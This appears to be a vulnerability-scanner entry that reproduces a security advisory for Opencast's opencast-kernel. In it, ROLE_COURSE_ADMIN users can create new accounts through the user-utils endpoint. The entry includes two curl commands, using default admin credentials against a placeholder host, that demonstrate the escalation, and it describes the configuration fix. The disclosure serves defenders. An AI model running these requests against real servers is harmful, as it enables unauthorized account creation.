QID 980397
QID 980397: Java (maven) Security Update for org.opencastproject:opencast-kernel (GHSA-94qw-r73x-j7hg)
Security update has been released for org.opencastproject:opencast-kernel to fix the vulnerability.
Note: The preceding description block is extracted directly from the security advisory. Using automation, we have attempted to clean and format it as much as possible without introducing additional issues.
Users with the role `ROLE_COURSE_ADMIN` can use the user-utils endpoint to create new users not including the role `ROLE_ADMIN`. For example:
```bash
# Use the admin to create a new user with ROLE_COURSE_ADMIN using the admin user.
# We expect this to work.
% curl -i -u admin:opencast 'https://example.opencast.org/user-utils/xy.json' -X PUT \
--data 'password=f&roles=%5B%22ROLE_COURSE_ADMIN%22%5D'
HTTP/2 201
# Use the new user to create more new users.
# We don't expect a user with just role ROLE_COURSE_ADMIN to succeed.
# But it does work
% curl -i -u xy:f 'https://example.opencast.org/user-utils/ab.json' -X PUT \
--data 'password=f&roles=%5B%22ROLE_COURSE_ADMIN%22%5D'
HTTP/2 201
```
`ROLE_COURSE_ADMIN` is a non-standard role in Opencast which is referenced neither in the documentation nor in any code (except for tests) but only in the security configuration. From the name implying an admin for a specific course users would never expect that this role allows user creation.
You can fix this issue by removing all instances of `ROLE_COURSE_ADMIN` in your organization's security configuration (`etc/security/mh_default_org.xml` by default).
- GHSA-94qw-r73x-j7hg -
github.com/advisories/GHSA-94qw-r73x-j7hg
CVEs related to QID 980397
| Advisory ID | Software | Component | Link |
|---|---|---|---|
| GHSA-94qw-r73x-j7hg | org.opencastproject:opencast-kernel |
github.com/advisories/GHSA-94qw-r73x-j7hg |